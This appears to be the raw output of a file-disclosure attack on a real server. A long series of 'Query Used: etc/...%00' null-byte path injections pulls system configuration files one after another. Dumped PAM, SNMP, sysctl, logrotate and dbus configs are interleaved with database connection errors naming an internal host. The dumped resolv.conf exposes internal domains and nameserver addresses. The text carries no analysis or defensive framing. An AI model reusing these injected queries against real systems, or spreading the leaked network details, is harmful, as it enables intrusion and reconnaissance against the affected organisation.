- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.2 = "14.00"
- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.3 = "14.00"
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.1 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.2 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrorFlag.3 = 0
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.1 = ""
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.2 = ""
- # enterprises.ucdavis.loadTable.laEntry.loadaveErrMessage.3 = ""
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Extensible sections.
- #
- # This alleviates the multiple line output problem found in the
- # previous executable mib by placing each mib in its own mib table:
- # Run a shell script containing:
- #
- # #!/bin/sh
- # echo hello world
- # echo hi there
- # exit 35
- #
- # Note: this has been specifically commented out to prevent
- # accidental security holes due to someone else on your system writing
- # a /tmp/shtest before you do. Uncomment to use it.
- #
- # exec .1.3.6.1.4.1.2021.50 shelltest /bin/sh /tmp/shtest
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.50
- # enterprises.ucdavis.50.1.1 = 1
- # enterprises.ucdavis.50.2.1 = "shelltest"
- # enterprises.ucdavis.50.3.1 = "/bin/sh /tmp/shtest"
- # enterprises.ucdavis.50.100.1 = 35
- # enterprises.ucdavis.50.101.1 = "hello world."
- # enterprises.ucdavis.50.101.2 = "hi there."
- # enterprises.ucdavis.50.102.1 = 0
- # Now the Output has grown to two lines, and we can see the 'hi
- # there.' output as the second line from our shell script.
- #
- # Note that you must alter the mib.txt file to be correct if you want
- # the .50.* outputs above to change to reasonable text descriptions.
- # Other ideas:
- #
- # exec .1.3.6.1.4.1.2021.51 ps /bin/ps
- # exec .1.3.6.1.4.1.2021.52 top /usr/local/bin/top
- # exec .1.3.6.1.4.1.2021.53 mailq /usr/bin/mailq
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Pass through control.
- #
- # Usage:
- # pass MIBOID EXEC-COMMAND
- #
- # This will pass total control of the mib underneath the MIBOID
- # portion of the mib to the EXEC-COMMAND.
- #
- # Note: You'll have to change the path of the passtest script to your
- # source directory or install it in the given location.
- #
- # Example: (see the script for details)
- # (commented out here since it requires that you place the
- # script in the right location. (its not installed by default))
- # pass .1.3.6.1.4.1.2021.255 /bin/sh /usr/local/local/passtest
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.255
- # enterprises.ucdavis.255.1 = "life the universe and everything"
- # enterprises.ucdavis.255.2.1 = 42
- # enterprises.ucdavis.255.2.2 = OID: 42.42.42
- # enterprises.ucdavis.255.3 = Timeticks: (363136200) 42 days, 0:42:42
- # enterprises.ucdavis.255.4 = IpAddress: 127.0.0.1
- # enterprises.ucdavis.255.5 = 42
- # enterprises.ucdavis.255.6 = Gauge: 42
- #
- # % snmpget -v 1 localhost public .1.3.6.1.4.1.2021.255.5
- # enterprises.ucdavis.255.5 = 42
- #
- # % snmpset -v 1 localhost public .1.3.6.1.4.1.2021.255.1 s "New string"
- # enterprises.ucdavis.255.1 = "New string"
- #
- # For specific usage information, see the man/snmpd.conf.5 manual page
- # as well as the local/passtest script used in the above example.
- ###############################################################################
- # Further Information
- #
- # See the snmpd.conf manual page, and the output of "snmpd -H".
- <b>Query Used: share/snmp/snmpd.conf%00</b>.<b>Query Used: etc/cvs-cron.conf%00</b>.<b>Query Used: etc/clamav/freshclam.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/ca-certificates.conf%00</b>.<b>Query Used: etc/debconf.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/bash_completion.d/debconf%00</b>.<b>Query Used: etc/tor/tor-tsocks.conf%00</b>.<b>Query Used: etc/htdig/htdig.conf%00</b>.<b>Query Used: etc/remastersys.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/default-modules.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/extra-modules.conf%00</b>.<b>Query Used: etc/gconf%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults/%gconf-tree.xml%00</b>.<b>Query Used: etc/tor/tor-tsocks.conf%00</b>.<b>Query Used: etc/xdg/user-dirs.conf%00</b>.<b>Query Used: etc/htdig/htdig.conf%00</b>.<b>Query Used: etc/remastersys.conf%00</b>.<b>Query Used: etc/gnome-vfs-2.0/modules/default-modules.conf%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults%00</b>.<b>Query Used: etc/gconf/2%00</b>.<b>Query Used: etc/mysql/conf.d%00</b>.<b>Query Used: etc/gconf/gconf.xml.defaults/%gconf-tree.xml%00</b>.<b>Query Used: etc/gconf/gconf.xml.system%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/gconf/2/evoldap.conf%00</b>.<b>Query Used: etc/gconf/2/path%00</b>.<b>Query Used: etc/gconf/gconf.xml.mandatory/%gconf-tree.xml%00</b>.<b>Query Used: etc/modprobe.d/vmware-tools.conf%00</b>.<b>Query Used: etc/fonts/conf.d%00</b><b>Query Used: etc/fonts/conf.d/README%00</b>conf.d/README
- Each file in this directory is a fontconfig configuration file. Fontconfig
- scans this directory, loading all files of the form [0-9][0-9]*.conf.
- These files are normally installed in conf.avail and then symlinked here,
- allowing them to be easily installed and then enabled/disabled by adjusting
- the symlinks.
- The files are loaded in numeric order, the structure of the configuration
- has led to the following conventions in usage:
- Files begining with: Contain:
- 00 through 09 Font directories
- 10 through 19 system rendering defaults (AA, etc)
- 20 through 29 font rendering options
- 30 through 39 family substitution
- 40 through 49 generic identification, map family->generic
- 50 through 59 alternate config file loading
- 60 through 69 generic aliases, map generic->family
- 70 through 79 select font (adjust which fonts are available)
- 80 through 89 match target="scan" (modify scanned patterns)
- 90 through 99 font synthesis
- <b>Query Used: etc/miredo.confetc/bluetooth/input.conf%00</b>.<b>Query Used: etc/bluetooth/network.conf%00</b>.<b>Query Used: etc/bluetooth/rfcomm.conf%00</b>.<b>Query Used: etc/ldap/ldap.conf%00</b>.<b>Query Used: etc/cups/pdftops.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf.default%00</b>.<b>Query Used: etc/cups/acroread.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf%00</b>.<b>Query Used: etc/oinkmaster.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/security/time.conf%00</b># this is an example configuration file for the pam_time module. Its syntax
- # was initially based heavily on that of the shadow package (shadow-960129).
- #
- # the syntax of the lines is as follows:
- #
- # services;ttys;users;times
- #
- # white space is ignored and lines maybe extended with '\\n' (escaped
- # newlines). As should be clear from reading these comments,
- # text following a '#' is ignored to the end of the line.
- #
- # the combination of individual users/terminals etc is a logic list
- # namely individual tokens that are optionally prefixed with '!' (logical
- # not) and separated with '&' (logical and) and '|' (logical or).
- #
- # services
- # is a logic list of PAM service names that the rule applies to.
- #
- # ttys
- # is a logic list of terminal names that this rule applies to.
- #
- # users
- # is a logic list of users or a netgroup of users to whom this
- # rule applies.
- #
- # NB. For these items the simple wildcard '*' may be used only once.
- #
- # times
- # the format here is a logic list of day/time-range
- # entries the days are specified by a sequence of two character
- # entries, MoTuSa for example is Monday Tuesday and Saturday. Note
- # that repeated days are unset MoMo = no day, and MoWk = all weekdays
- # bar Monday. The two character combinations accepted are
- #
- # Mo Tu We Th Fr Sa Su Wk Wd Al
- #
- # the last two being week-end days and all 7 days of the week
- # respectively. As a final example, AlFr means all days except Friday.
- #
- # each day/time-range can be prefixed with a '!' to indicate "anything
- # but"
- #
- # The time-range part is two 24-hour times HHMM separated by a hyphen
- # indicating the start and finish time (if the finish time is smaller
- # than the start time it is deemed to apply on the following day).
- #
- # for a rule to be active, ALL of service+ttys+users must be satisfied
- # by the applying process.
- #
- #
- # Here is a simple example: running blank on tty* (any ttyXXX device),
- # the users 'you' and 'me' are denied service all of the time
- #
- #blank;tty* & !ttyp*;you|me;!Al0000-2400
- # Another silly example, user 'root' is denied xsh access
- # from pseudo terminals at the weekend and on mondays.
- #xsh;ttyp*;root;!WdMo0000-2400
- #
- # End of example file.
- #
- <b>Query Used: etc/security/sepermit.conf%00</b># /etc/security/sepermit.conf
- #
- # Each line contains either:
- # - an user name
- # - a group name, with @group syntax
- # - a SELinux user name, with %seuser syntax
- # Each line can contain optional arguments separated by :
- # The possible arguments are:
- # - exclusive - only single login session will
- # be allowed for the user and the user's processes
- # will be killed on logout
- <b>Query Used: etc/security/limits.conf%00</b># /etc/security/limits.conf
- #
- #Each line describes a limit for a user in the form:
- #
- #<domain> <type> <item> <value>
- #
- #Where:
- #<domain> can be:
- # - an user name
- # - a group name, with @group syntax
- # - the wildcard *, for default entry
- # - the wildcard %, can be also used with %group syntax,
- # for maxlogin limit
- #
- #<type> can have the two values:
- # - "soft" for enforcing the soft limits
- # - "hard" for enforcing hard limits
- #
- #<item> can be one of the following:
- # - core - limits the core file size (KB)
- # - data - max data size (KB)
- # - fsize - maximum filesize (KB)
- # - memlock - max locked-in-memory address space (KB)
- # - nofile - max number of open files
- # - rss - max resident set size (KB)
- # - stack - max stack size (KB)
- # - cpu - max CPU time (MIN)
- # - nproc - max number of processes
- # - as - address space limit (KB)
- # - maxlogins - max number of logins for this user
- # - maxsyslogins - max number of logins on the system
- # - priority - the priority to run user process with
- # - locks - max number of file locks the user can hold
- # - sigpending - max number of pending signals
- # - msgqueue - max memory used by POSIX message queues (bytes)
- # - nice - max nice priority allowed to raise to values: [-20, 19]
- # - rtprio - max realtime priority
- #
- #<domain> <type> <item> <value>
- #
- #* soft core 0
- #* hard rss 10000
- #@student hard nproc 20
- #@faculty soft nproc 20
- #@faculty hard nproc 50
- #ftp hard nproc 0
- #@student - maxlogins 4
- # End of file
- <b>Query Used: etc/security/group.conf%00</b>#
- # This is the configuration file for the pam_group module.
- #
- #
- # *** Please note that giving group membership on a session basis is
- # *** NOT inherently secure. If a user can create an executable that
- # *** is setgid a group that they are infrequently given membership
- # *** of, they can basically obtain group membership any time they
- # *** like. Example: games are allowed between the hours of 6pm and 6am
- # *** user joe logs in at 7pm writes a small C-program toplay.c that
- # *** invokes their favorite shell, compiles it and does
- # *** "chgrp play toplay; chmod g+s toplay". They are basically able
- # *** to play games any time... You have been warned. AGM
- #
- #
- # The syntax of the lines is as follows:
- #
- # services;ttys;users;times;groups
- #
- # white space is ignored and lines maybe extended with '\\n' (escaped
- # newlines). From reading these comments, it is clear that
- # text following a '#' is ignored to the end of the line.
- #
- # the combination of individual users/terminals etc is a logic list
- # namely individual tokens that are optionally prefixed with '!' (logical
- # not) and separated with '&' (logical and) and '|' (logical or).
- #
- # services
- # is a logic list of PAM service names that the rule applies to.
- #
- # ttys
- # is a logic list of terminal names that this rule applies to.
- #
- # users
- # is a logic list of users or a netgroup of users to whom this
- # rule applies.
- #
- # NB. For these items the simple wildcard '*' may be used only once.
- # With netgroups no wildcards or logic operators are allowed.
- #
- # times
- # It is used to indicate "when" these groups are to be given to the
- # user. The format here is a logic list of day/time-range
- # entries the days are specified by a sequence of two character
- # entries, MoTuSa for example is Monday Tuesday and Saturday. Note
- # that repeated days are unset MoMo = no day, and MoWk = all weekdays
- # bar Monday. The two character combinations accepted are
- #
- # Mo Tu We Th Fr Sa Su Wk Wd Al
- #
- # the last two being week-end days and all 7 days of the week
- # respectively. As a final example, AlFr means all days except Friday.
- #
- # Each day/time-range can be prefixed with a '!' to indicate "anything
- # but"
- #
- # The time-range part is two 24-hour times HHMM separated by a hyphen
- # indicating the start and finish time (if the finish time is smaller
- # than the start time it is deemed to apply on the following day).
- #
- # groups
- # The (comma or space separated) list of groups that the user
- # inherits membership of. These groups are added if the previous
- # fields are satisfied by the user's request
- #
- # For a rule to be active, ALL of service+ttys+users must be satisfied
- # by the applying process.
- #
- #
- # Note, to get this to work as it is currently typed you need
- #
- # 1. to run an application as root
- # 2. add the following groups to the /etc/group file:
- # floppy, play, sound
- #
- #
- # Here is a simple example: running 'xsh' on tty* (any ttyXXX device),
- # the user 'us' is given access to the floppy (through membership of
- # the floppy group)
- #
- #xsh;tty*&!ttyp*;us;Al0000-2400;floppy
- #
- # another example: running 'xsh' on tty* (any ttyXXX device),
- # the user 'sword' is given access to games (through membership of
- # the sound and play group) after work hours.
- #
- #xsh; tty* ;sword;!Wk0900-1800;sound, play
- #xsh; tty* ;*;Al0900-1800;floppy
- #
- # End of group.conf file
- #
- <b>Query Used: etc/security/pam_env.conf%00</b>#
- # This is the configuration file for pam_env, a PAM module to load in
- # a configurable list of environment variables for a
- #
- # The original idea for this came from Andrew G. Morgan ...
- #<quote>
- # Mmm. Perhaps you might like to write a pam_env module that reads a
- # default environment from a file? I can see that as REALLY
- # useful... Note it would be an "auth" module that returns PAM_IGNORE
- # for the auth part and sets the environment returning PAM_SUCCESS in
- # the setcred function...
- #</quote>
- #
- # What I wanted was the REMOTEHOST variable set, purely for selfish
- # reasons, and AGM didn't want it added to the SimpleApps login
- # program (which is where I added the patch). So, my first concern is
- # that variable, from there there are numerous others that might/would
- # be useful to be set: NNTPSERVER, LESS, PATH, PAGER, MANPAGER .....
- #
- # Of course, these are a different kind of variable than REMOTEHOST in
- # that they are things that are likely to be configured by
- # administrators rather than set by logging in, how to treat them both
- # in the same config file?
- #
- # Here is my idea:
- #
- # Each line starts with the variable name, there are then two possible
- # options for each variable DEFAULT and OVERRIDE.
- # DEFAULT allows and administrator to set the value of the
- # variable to some default value, if none is supplied then the empty
- # string is assumed. The OVERRIDE option tells pam_env that it should
- # enter in its value (overriding the default value) if there is one
- # to use. OVERRIDE is not used, "" is assumed and no override will be
- # done.
- #
- # VARIABLE [DEFAULT=[value]] [OVERRIDE=[value]]
- #
- # (Possibly non-existent) environment variables may be used in values
- # using the ${string} syntax and (possibly non-existent) PAM_ITEMs may
- # be used in values using the @{string} syntax. Both the $ and @
- # characters can be backslash escaped to be used as literal values
- # values can be delimited with "", escaped " not supported.
- # Note that many environment variables that you would like to use
- # may not be set by the time the module is called.
- # For example, HOME is used below several times, but
- # many PAM applications don't make it available by the time you need it.
- #
- #
- # First, some special variables
- #
- # Set the REMOTEHOST variable for any hosts that are remote, default
- # to "localhost" rather than not being set at all
- #REMOTEHOST DEFAULT=localhost OVERRIDE=@{PAM_RHOST}
- #
- # Set the DISPLAY variable if it seems reasonable
- #DISPLAY DEFAULT=${REMOTEHOST}:0.0 OVERRIDE=${DISPLAY}
- #
- #
- # Now some simple variables
- #
- #PAGER DEFAULT=less
- #MANPAGER DEFAULT=less
- #LESS DEFAULT="M q e h15 z23 b80"
- #NNTPSERVER DEFAULT=localhost
- #PATH DEFAULT=${HOME}/bin:/usr/local/bin:/bin\
- #:/usr/bin:/usr/local/bin/X11:/usr/bin/X11
- #
- # silly examples of escaped variables, just to show how they work.
- #
- #DOLLAR DEFAULT=\$
- #DOLLARDOLLAR DEFAULT= OVERRIDE=\$${DOLLAR}
- #DOLLARPLUS DEFAULT=\${REMOTEHOST}${REMOTEHOST}
- #ATSIGN DEFAULT="" OVERRIDE=\@
- <b>Query Used: etc/deluser.conf%00</b>.<b>Query Used: etc/miredo-server.conf%00</b>.<b>Query Used: .etc/mail/sendmail.conf%00</b>.<b>Query Used: etc/belocs/locale-gen.conf%00</b>.<b>Query Used: etc/snort/threshold.conf%00</b>.<b>Query Used: etc/snort/rules/open-test.conf%00</b>.<b>Query Used: etc/snort/rules/emerging.conf%00</b>.<b>Query Used: etc/snort/snort-mysql.conf%00</b>.<b>Query Used: etc/snort/reference.config%00</b>.<b>Query Used: etc/arpalert/arpalert.conf%00</b>.<b>Query Used: etc/udev/udev.conf%00</b># The initial syslog(3) priority: "err", "info", "debug" or its
- # numerical equivalent. For runtime debugging, the daemons internal
- # state can be changed with: "udevadm control --log-priority=<value>".
- udev_log="err"
- <b>Query Used: etc/resolvconf%00</b>.<b>Query Used: etc/resolvconf/update-libc.d%00</b>.<b>Query Used: etc/resolvconf/update-libc.d/sendmail%00</b>.<b>Query Used: etc/airoscript.conf%00</b>.<b>Query Used: etc/foremost.conf%00</b>.<b>Query Used: etc/scrollkeeper.conf%00</b>.<b>Query Used: etc/pam.conf%00</b>.<b>Query Used: etc/nsswitch.conf%00</b>#
- # /etc/nsswitch.conf
- #
- # An example Name Service Switch config file. This file should be
- # sorted with the most-used services at the beginning.
- #
- # The entry '[NOTFOUND=return]' means that the search for an
- # entry should stop if the search in the previous entry turned
- # up nothing. Note that if the search failed due to some other reason
- # (like no NIS server responding) then the search continues with the
- # next entry.
- #
- # Valid entries include:
- #
- # nisplus Use NIS+ (NIS version 3)
- # nis Use NIS (NIS version 2), also called YP
- # dns Use DNS (Domain Name Service)
- # files Use the local files
- # db Use the local database (.db) files
- # compat Use NIS on compat mode
- # hesiod Use Hesiod for user lookups
- # [NOTFOUND=return] Stop searching if not found so far
- #
- # To use db, put the "db" in front of "files" for entries you want to be
- # looked up first in the databases
- #
- # Example:
- #passwd: db files nisplus nis
- #shadow: db files nisplus nis
- #group: db files nisplus nis
- passwd: files
- shadow: files
- group: files
- #hosts: db files nisplus nis dns
- hosts: files dns
- # Example - obey only what nisplus tells us...
- #services: nisplus [NOTFOUND=return] files
- #networks: nisplus [NOTFOUND=return] files
- #protocols: nisplus [NOTFOUND=return] files
- #rpc: nisplus [NOTFOUND=return] files
- #ethers: nisplus [NOTFOUND=return] files
- #netmasks: nisplus [NOTFOUND=return] files
- bootparams: nisplus [NOTFOUND=return] files
- ethers: files
- netmasks: files
- networks: files
- protocols: files
- rpc: files
- services: files
- netgroup: nisplus
- publickey: nisplus
- automount: files nisplus
- aliases: files nisplus
- <b>Query Used: etc/initramfs-tools/conf.d%00</b>.<b>Query Used: etc/GeoIP.conf.default%00</b>.<b>Query Used: etc/proxychains.conf%00</b>.<b>Query Used: etc/host.conf%00</b>multi on
- <b>Query Used: etc/tinyproxy/tinyproxy.conf%00</b>.<b>Query Used: etc/freetds/freetds.conf%00</b>.<b>Query Used: etc/prelude/default/global.conf%00</b>.<b>Query Used: etc/prelude/default/idmef-client.conf%00</b>.<b>Query Used: etc/prelude/default/tls.conf%00</b>.<b>Query Used: etc/apache2/httpd.conf%00</b>.<b>Query Used: etc/apache2/conf.d%00</b>.<b>Query Used: etc/apache2/conf.d/charset%00</b>.<b>Query Used: etc/apache2/mods-enabled/deflate.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/mime.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/dir.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/alias.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/php5.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/negotiation.conf%00</b>.<b>Query Used: etc/apache2/mods-enabled/status.conf%00</b>.<b>Query Used: etc/apache2/mods-available/proxy.conf%00</b>.<b>Query Used: etc/apache2/mods-available/deflate.conf%00</b>.<b>Query Used: etc/apache2/mods-available/mime.conf%00</b>.<b>Query Used: etc/apache2/mods-available/dir.conf%00</b>.<b>Query Used: etc/apache2/mods-available/mem_cache.conf%00</b>.<b>Query Used: etc/apache2/mods-available/ssl.conf%00</b>.<b>Query Used: etc/apache2/mods-available/autoindex.conf%00</b>.<b>Query Used: etc/apache2/mods-available/setenvif.conf%00</b>.<b>Query Used: etc/updatedb.conf%00</b>PRUNE_BIND_MOUNTS = "yes"
- PRUNEFS = "9p afs anon_inodefs auto autofs bdev binfmt_misc cgroup cifs coda configfs cpuset debugfs devpts ecryptfs exofs fuse fusectl gfs gfs2 hugetlbfs inotifyfs iso9660 jffs2 lustre mqueue ncpfs nfs nfs4 nfsd pipefs proc ramfs rootfs rpc_pipefs securityfs selinuxfs sfs sockfs sysfs tmpfs ubifs udf usbfs"
- PRUNENAMES = ".git .hg .svn"
- PRUNEPATHS = "/afs /media /net /sfs /tmp /udev /var/cache/ccache /var/spool/cups /var/spool/squid /var/tmp"
- <b>Query Used: etc/kernel-pkg.conf%00</b>.<b>Query Used: etc/samba/dhcp.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/samba/smb.conf%00</b>.<b>Query Used: etc/ltrace.conf%00</b>.<b>Query Used: etc/bonobo-activation/bonobo-activation-config.xml%00</b>.<b>Query Used: etc/sysctl.conf%00</b># Kernel sysctl configuration file for Red Hat Linux
- #
- # For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
- # sysctl.conf(5) for more details.
- # Controls IP packet forwarding
- net.ipv4.ip_forward = 0
- # Controls source route verification
- net.ipv4.conf.default.rp_filter = 1
- # Do not accept source routing
- net.ipv4.conf.default.accept_source_route = 0
- # Controls the System Request debugging functionality of the kernel
- kernel.sysrq = 0
- # Controls whether core dumps will append the PID to the core filename.
- # Useful for debugging multi-threaded applications.
- kernel.core_uses_pid = 1
- # Controls the use of TCP syncookies
- net.ipv4.tcp_syncookies = 1
- # Disable netfilter on bridges.
- net.bridge.bridge-nf-call-ip6tables = 0
- net.bridge.bridge-nf-call-iptables = 0
- net.bridge.bridge-nf-call-arptables = 0
- # Controls the maximum size of a message, in bytes
- kernel.msgmnb = 65536
- # Controls the default maxmimum size of a mesage queue
- kernel.msgmax = 65536
- # Controls the maximum shared segment size, in bytes
- kernel.shmmax = 68719476736
- # Controls the maximum number of shared memory segments, in pages
- kernel.shmall = 4294967296
- #Arp fix for LVS
- net.ipv4.conf.lo.arp_ignore = 1
- net.ipv4.conf.lo.arp_announce = 2
- net.ipv4.conf.all.arp_ignore = 1
- net.ipv4.conf.all.arp_announce = 2
- <b>Query Used: etc/mono/config%00</b>.<b>Query Used: etc/mono/2.0/machine.config%00</b>.<b>Query Used: etc/mono/2.0/web.config%00</b>.<b>Query Used: etc/mono/1.0/machine.config%00</b>.<b>Query Used: etc/sensors.conf%00</b>.<b>Query Used: etc/X11/xorg.conf-vesa%00</b>.<b>Query Used: etc/X11/xorg.conf.BeforeVMwareToolsInstall%00</b>.<b>Query Used: etc/X11/xorg.conf%00</b>.<b>Query Used: etc/X11/xorg.conf-vmware%00</b>.<b>Query Used: etc/X11/xorg.conf.orig%00</b>.<b>Query Used: etc/smi.conf%00</b>.<b>Query Used: etc/postgresql-common/autovacuum.conf%00</b>.<b>Query Used: etc/python/debian_config%00</b>.<b>Query Used: etc/hdparm.conf%00</b>.<b>Query Used: etc/discover.conf.d%00</b>.<b>Query Used: etc/discover.conf.d/00discover%00</b>.<b>Query Used: etc/casper.conf%00</b>.<b>Query Used: etc/discover-modprobe.conf%00</b>.<b>Query Used: etc/updatedb.conf.BeforeVMwareToolsInstall%00</b>.<b>Query Used: etc/apt/apt.conf.d%00</b>.<b>Query Used: etc/apt/apt.conf.d/00trustcdrom%00</b>.<b>Query Used: etc/apt/apt.conf.d/70debconf%00</b>.<b>Query Used: etc/apt/apt.conf.d/05aptitude%00</b>.<b>Query Used: etc/apt/apt.conf.d/50unattended-upgrades%00</b>.<b>Query Used: etc/apt/apt.conf.d/01ubuntu%00</b>.<b>Query Used: etc/apt/apt.conf.d/01autoremove%00</b>.<b>Query Used: etc/vmware-tools/config%00</b>.<b>Query Used: etc/vmware-tools/vmware-tools-libraries.conf%00</b>.<b>Query Used: etc/vmware-tools/tpvmlp.conf%00</b>.<b>Query Used: etc/miredo/miredo.conf%00</b>.<b>Query Used: etc/miredo/miredo-server.conf%00</b>.<b>Query Used: etc/PolicyKit/PolicyKit.conf%00</b>.<b>Query Used: etc/gtk-2.0/im-multipress.conf%00</b>.<b>Query Used: etc/resolv.conf%00</b># Generated by NetworkManager
- domain mo.nids.noaa.gov
- search mo.nids.noaa.gov dev.nids.noaa.gov md.nids.noaa.gov nids.noaa.gov
- nameserver 10.251.3.105
- nameserver 10.251.2.105
- nameserver 10.251.4.105
- # NOTE: the libc resolver may not support more than 3 nameservers.
- # The nameservers listed below may not be recognized.
- nameserver 204.227.96.136
- nameserver 204.227.96.137
- <b>Query Used: etc/adduser.conf%00</b>.<b>Query Used: etc/subversion/config%00</b>.<b>Query Used: etc/openvpn/update-resolv-conf%00</b>.<b>Query Used: etc/cvs-pserver.conf%00</b>.<b>Query Used: etc/pear/pear.conf%00</b>.<b>Query Used: etc/dns2tcpd.conf%00</b>.<b>Query Used: etc/java-6-sun/fontconfig.properties%00</b>.<b>Query Used: etc/privoxy/config%00</b>.<b>Query Used: etc/gre.d/1.9.0.14.system.conf%00</b>.<b>Query Used: etc/gre.d/1.9.0.15.system.conf%00</b>.<b>Query Used: etc/gre.d/1.9.0.10.system.conf%00</b>.<b>Query Used: etc/logrotate.conf%00</b># see "man logrotate" for details
- # rotate log files weekly
- weekly
- # keep 4 weeks worth of backlogs
- rotate 4
- # create new (empty) log files after rotating old ones
- create
- # use date as a suffix of the rotated file
- dateext
- # uncomment this if you want your log files compressed
- #compress
- # RPM packages drop log rotation information into this directory
- include /etc/logrotate.d
- # no packages own wtmp and btmp -- we'll rotate them here
- /var/log/wtmp {
- monthly
- create 0664 root utmp
- minsize 1M
- rotate 1
- }
- /var/log/btmp {
- missingok
- monthly
- create 0600 root utmp
- rotate 1
- }
- # system-specific logs may be also be configured here.
- <b>Query Used: etc/skel/.kde3/share/apps/kconf_update%00</b>.<b>Query Used: etc/skel/.kde3/share/apps/kconf_update/log/update.log%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update/log%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update/log/update.log%00</b>.<b>Query Used: etc/skel/.config%00</b>.<b>Query Used: etc/skel/.config/Trolltech.conf%00</b>.<b>Query Used: etc/skel/.config/menus%00</b>.<b>Query Used: etc/skel/.config/menus/applications-kmenuedit.menu%00</b>.<b>Query Used: etc/skel/.config/user-dirs.locale%00</b>.<b>Query Used: etc/skel/.config/codef00.com%00</b>.<b>Query Used: etc/skel/.config/user-dirs.dirs%00</b>.<b>Query Used: etc/avahi/avahi-daemon.conf%00</b>.<b>Query Used: etc/dhcp3/dhcpd.conf%00</b>.<b>Query Used: etc/dhcp3/dhclient.conf%00</b>.<b>Query Used: etc/splashy/config.xml%00</b>.<b>Query Used: etc/reader.conf.old%00</b>.<b>Query Used: etc/defoma/config%00</b>.<b>Query Used: etc/defoma/config/x-ttcidfont-conf.conf2%00</b>.<b>Query Used: etc/wicd/manager-settings.conf%00</b>.<b>Query Used: etc/wicd/wireless-settings.conf%00</b>.<b>Query Used: etc/wicd/dhclient.conf.template.default%00</b>.<b>Query Used: etc/wicd/wired-settings.conf%00</b>.<b>Query Used: etc/sysctl.d/wine.sysctl.conf%00</b>.<b>Query Used: etc/sysctl.d/10-network-security.conf%00</b>.<b>Query Used: etc/sysctl.d/10-console-messages.conf%00</b>.<b>Query Used: etc/kbd/config%00</b>.<b>Query Used: etc/sysctl.d/10-process-security.conf%00</b>.<b>Query Used: etc/w3m/config%00</b>.<b>Query Used: etc/reader.conf.d%00</b>.<b>Query Used: etc/reader.conf.d/libccidtwin%00</b>.<b>Query Used: etc/reader.conf.d/0comments%00</b>.<b>Query Used: etc/reader.conf%00</b>.<b>Query Used: etc/kbd/config%00</b>.<b>Query Used: etc/dbus-1/session.conf%00</b><!-- This configuration file controls the per-user-login-session message bus.
- Add a session-local.conf and edit that rather than changing this
- file directly. -->
- <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN"
- "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
- <busconfig>
- <!-- Our well-known bus type, don't change this -->
- <type>session</type>
- <!-- If we fork, keep the user's original umask to avoid affecting
- the behavior of child processes. -->
- <keep_umask/>
- <listen>unix:tmpdir=/tmp</listen>
- <standard_session_servicedirs />
- <policy context="default">
- <!-- Allow everything to be sent -->
- <allow send_destination="*" eavesdrop="true"/>
- <!-- Allow everything to be received -->
- <allow eavesdrop="true"/>
- <!-- Allow anyone to own anything -->
- <allow own="*"/>
- </policy>
- <!-- Config files are placed here that among other things,
- further restrict the above policy for specific services. -->
- <includedir>session.d</includedir>
- <!-- This is included last so local configuration can override what's
- in this standard file -->
- <include ignore_missing="yes">session-local.conf</include>
- <include if_selinux_enabled="yes" selinux_root_relative="yes">contexts/dbus_contexts</include>
- <!-- For the session bus, override the default relatively-low limits
- with essentially infinite limits, since the bus is just running
- as the user anyway, using up bus resources is not something we need
- to worry about. In some cases, we do set the limits lower than
- "all available memory" if exceeding the limit is almost certainly a bug,
- having the bus enforce a limit is nicer than a huge memory leak. But the
- intent is that these limits should never be hit. -->
- <!-- the memory limits are 1G instead of say 4G because they can't exceed 32-bit signed int max -->
- <limit name="max_incoming_bytes">1000000000</limit>
- <limit name="max_outgoing_bytes">1000000000</limit>
- <limit name="max_message_size">1000000000</limit>
- <limit name="service_start_timeout">120000</limit>
- <limit name="auth_timeout">240000</limit>
- <limit name="max_completed_connections">100000</limit>
- <limit name="max_incomplete_connections">10000</limit>
- <limit name="max_connections_per_user">100000</limit>
- <limit name="max_pending_service_starts">10000</limit>
- <limit name="max_names_per_connection">50000</limit>
- <limit name="max_match_rules_per_connection">50000</limit>
- <limit name="max_replies_per_connection">50000</limit>
- </busconfig>
- <b>Query Used: etc/dbus-1/system.conf%00</b><!-- This configuration file controls the systemwide message bus.
- Add a system-local.conf and edit that rather than changing this
- file directly. -->
- <!-- Note that there are any number of ways you can hose yourself
- security-wise by screwing up this file; in particular, you
